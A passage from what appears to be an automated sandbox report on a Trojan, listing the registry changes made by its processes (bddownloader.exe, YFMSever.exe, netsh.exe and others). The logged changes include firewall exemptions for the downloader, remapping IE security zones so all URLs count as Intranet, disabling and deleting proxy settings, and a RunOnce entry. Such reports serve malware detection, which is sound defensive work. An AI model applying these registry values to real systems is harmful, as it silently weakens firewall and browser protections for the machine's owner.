%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CA8D6JGD.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\CAXPJNAK.gif (0 bytes)
Registry activity
The process wwwww_3340.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 DC D5 20 F6 C6 7F DD C1 32 A2 7D 66 5F 1B 86"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process vcredist_x86.exe:2720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 C1 A2 30 0E 0A 98 A1 2E 12 2B CA 17 1D F8 19"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0"
The process netsh.exe:3112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1E F2 32 92 B2 4D 24 FB 16 EA EA 3D F3 DC 6C"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\107]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe:*:Enabled:百度高速下载器"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\107]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe:*:Enabled:百度高速下载器"
The process bddownloader.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 3C CD 0A D5 A9 15 92 D9 0E 05 A9 09 3D B6 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process bddownloader.exe:2820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 9C 97 C8 10 8F E6 99 70 BA 64 87 AC 87 5D 82"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process bddownloader.exe:2984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\baidu\bddownload\107\bddownloader.exe"
[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\107\bddownloader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"
[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"
[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"
[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 53 3E BE EC 23 80 3F 78 94 0A 72 E8 A7 7B A0"
[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process guagua_77150006814.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 50 F6 7C AC F6 D5 BA A2 3B BA 70 7F 5B 85 C0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 17 9D 3C 29 22 76 80 8A 82 83 C5 38 5D 7E A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process sc.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 19 AB 94 E1 E4 2E 42 42 05 31 6C A9 B0 4F F8"
The process sc.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 9F 68 B5 AB 96 A0 E8 DD 1A E9 A6 83 0A 50 7C"
The process YFMSever.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 B7 30 96 30 FC AE 84 C0 92 0C A5 D6 AF 36 92"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process BDDownloader.exe:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 43 3B CB 19 9E 58 1A 17 18 7F C6 21 94 C3 DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\baidu\bddownload\107]
"bddownloader.exe" = "百度高速下载引擎"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process BDDownloader.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 9B D0 CE E6 55 EE 51 BE 15 D9 56 65 80 64 96"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MsiExec.exe:3196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 5F 66 F5 86 1D 4F A9 6E 9C 71 8F AB 22 A7 D6"
The process candid.exe:1548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 9E FF 18 95 09 FD B0 BF 1A A8 59 18 66 B4 67"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
